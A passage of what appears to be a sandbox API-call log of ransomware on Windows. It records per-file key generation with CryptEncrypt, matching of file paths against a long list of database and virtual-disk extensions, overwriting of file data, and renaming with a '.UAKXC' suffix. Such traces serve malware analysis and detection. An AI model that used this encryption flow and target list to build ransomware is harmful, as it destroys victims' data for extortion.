(dwMilliseconds=0x1f4) [0117.468] Sleep (dwMilliseconds=0x1f4) [0117.983] Sleep (dwMilliseconds=0x1f4) [0118.498] Sleep (dwMilliseconds=0x1f4) [0119.307] Sleep (dwMilliseconds=0x1f4) [0119.815] Sleep (dwMilliseconds=0x1f4) [0120.742] Sleep (dwMilliseconds=0x1f4) [0121.272] Sleep (dwMilliseconds=0x1f4) [0121.805] Sleep (dwMilliseconds=0x1f4) [0122.494] Sleep (dwMilliseconds=0x1f4) [0123.047] Sleep (dwMilliseconds=0x1f4) [0123.573] Sleep (dwMilliseconds=0x1f4) [0124.084] Sleep (dwMilliseconds=0x1f4) [0124.844] Sleep (dwMilliseconds=0x1f4) [0125.347] Sleep (dwMilliseconds=0x1f4) [0125.862] Sleep (dwMilliseconds=0x1f4) [0126.376] Sleep (dwMilliseconds=0x1f4) [0126.891] Sleep (dwMilliseconds=0x1f4) [0127.572] Sleep (dwMilliseconds=0x1f4) [0128.217] Sleep (dwMilliseconds=0x1f4) [0128.731] Sleep (dwMilliseconds=0x1f4) [0129.246] Sleep (dwMilliseconds=0x1f4) [0129.761] Sleep (dwMilliseconds=0x1f4) [0130.380] Sleep (dwMilliseconds=0x1f4) [0130.915] Sleep (dwMilliseconds=0x1f4) [0131.430] Sleep (dwMilliseconds=0x1f4) [0131.945] Sleep (dwMilliseconds=0x1f4) [0132.522] Sleep (dwMilliseconds=0x1f4) [0136.526] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0136.537] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0136.537] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0136.537] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0136.537] GetFileAttributesW (lpFileName="C:\\Boot" (normalized: "c:\\boot")) returned 0x16 [0136.538] CreateFileW (lpFileName="C:\\Boot" (normalized: "c:\\boot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.538] GetLastError () returned 0x5 [0136.538] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8b68 | out: hHeap=0xea0000) returned 1 [0136.538] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0136.538] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0136.538] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0136.539] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 0x27 [0136.544] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x26) returned 1 [0136.544] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0136.544] GetLastError () returned 0x0 [0136.544] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0136.545] GetFileSizeEx (in: hFile=0x298, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=8192) returned 1 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".4dd") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".4dl") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".accdb") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".accdc") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".accde") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".accdr") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".accdt") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".accft") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".adb") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".ade") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".adf") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".adp") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".arc") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".ora") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".alf") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".ask") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".btr") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".bdf") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".cat") returned 0x0 [0136.545] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".cdb") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".ckp") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".cma") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".cpd") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dacpac") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dad") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dadiagrams") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".daschema") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".db") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".db-shm") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".db-wal") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".db3") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dbc") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dbf") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dbs") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dbt") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dbv") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dbx") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dcb") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dct") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dcx") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".ddl") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dlis") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dp1") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dqy") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dsk") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dsn") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dtsx") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".dxl") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".eco") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".ecx") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".edb") returned 0x0 [0136.546] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".epim") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".exb") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".fcd") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".fdb") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".fic") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".fmp") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".fmp12") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".fmpsl") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".fol") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".fp3") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".fp4") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".fp5") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".fp7") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".fpt") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".frm") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".gdb") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".grdb") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".gwi") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".hdb") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".his") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".ib") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".idb") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".ihx") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".itdb") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".itw") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".jet") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".jtx") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".kdb") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".kexi") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".kexic") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".kexis") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".lgc") returned 0x0 [0136.547] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".lwx") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".maf") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".maq") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".mar") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".mas") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".mav") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".mdb") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".mdf") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".mpd") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".mrg") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".mud") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".mwb") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".myd") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".ndf") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".nnt") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".nrmlib") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".ns2") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".ns3") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".ns4") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".nsf") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".nv") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".nv2") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".nwdb") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".nyf") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".odb") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".oqy") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".orx") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".owc") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".p96") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".p97") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".pan") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".pdb") returned 0x0 [0136.548] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".pdm") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".pnz") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".qry") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".qvd") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".rbf") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".rctd") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".rod") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".rodx") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".rpd") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".rsd") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".sas7bdat") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".sbf") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".scx") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".sdb") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".sdc") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".sdf") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".sis") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".spq") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".sql") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".sqlite") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".sqlite3") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".sqlitedb") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".te") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".temx") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".tmd") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".tps") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".trc") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".trm") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".udb") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".udl") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".usr") returned 0x0 [0136.549] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".v12") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".vis") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".vpd") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".vvv") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".wdb") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".wmdb") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".wrk") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".xdb") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".xld") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".xmlff") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".abcddb") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".abs") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".abx") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".accdw") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".adn") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".db2") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".fm5") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".hjt") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".icg") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".icr") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".kdb") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".lut") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".maw") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".mdn") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".mdt") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".vdi") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".vhd") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".vmdk") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".pvm") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".vmem") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".vmsn") returned 0x0 [0136.550] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".vmsd") returned 0x0 [0136.551] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".nvram") returned 0x0 [0136.551] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".vmx") returned 0x0 [0136.551] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".raw") returned 0x0 [0136.551] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".qcow2") returned 0x0 [0136.551] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".subvol") returned 0x0 [0136.551] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".bin") returned 0x0 [0136.551] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".vsv") returned 0x0 [0136.551] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".avhd") returned 0x0 [0136.551] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".vmrs") returned 0x0 [0136.551] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".vhdx") returned 0x0 [0136.551] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".avdx") returned 0x0 [0136.551] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".vmcx") returned 0x0 [0136.551] StrStrIW (lpFirst="C:\\BOOTSECT.BAK", lpSrch=".iso") returned 0x0 [0136.551] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0136.551] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.552] WriteFile (in: hFile=0x298, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0136.553] WriteFile (in: hFile=0x298, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0136.553] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0136.553] SetEndOfFile (hFile=0x298) returned 1 [0136.554] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.554] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0136.554] ReadFile (in: hFile=0x298, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x2000, lpOverlapped=0x0) returned 1 [0136.558] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0xffffe000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.559] WriteFile (in: hFile=0x298, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x2000, lpOverlapped=0x0) returned 1 [0136.559] CloseHandle (hObject=0x298) returned 1 [0136.563] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0136.564] GetProcessHeap () returned 0xea0000 [0136.564] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0136.564] LoadLibraryA (lpLibFileName="NTDLL.dll") returned 0x77c40000 [0136.564] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xee6e88 [0136.565] lstrcpyW (in: lpString1=0xee6e88, lpString2="C:\\BOOTSECT.BAK" | out: lpString1="C:\\BOOTSECT.BAK") returned="C:\\BOOTSECT.BAK" [0136.565] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0136.565] lstrcatW (in: lpString1="C:\\BOOTSECT.BAK", lpString2=".UAKXC" | out: lpString1="C:\\BOOTSECT.BAK.UAKXC") returned="C:\\BOOTSECT.BAK.UAKXC" [0136.565] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0136.566] MoveFileW (lpExistingFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), lpNewFileName="C:\\BOOTSECT.BAK.UAKXC" (normalized: "c:\\bootsect.bak.uakxc")) returned 1 [0136.567] GetProcessHeap () returned 0xea0000 [0136.567] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0136.567] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e88 | out: hHeap=0xea0000) returned 1 [0136.567] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8988 | out: hHeap=0xea0000) returned 1 [0136.567] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8960 | out: hHeap=0xea0000) returned 1 [0136.567] Sleep (dwMilliseconds=0x1f4) [0137.342] Sleep (dwMilliseconds=0x1f4) [0137.864] Sleep (dwMilliseconds=0x1f4) [0139.230] Sleep (dwMilliseconds=0x1f4) [0139.761] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0139.761] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0139.761] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0139.761] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.ini")) returned 0x20 [0139.762] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0139.762] GetLastError () returned 0x0 [0139.762] GetFileSizeEx (in: hFile=0x6c4, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=4003) returned 1 [0139.762] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".4dd") returned 0x0 [0139.762] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".4dl") returned 0x0 [0139.762] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".accdb") returned 0x0 [0139.762] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla 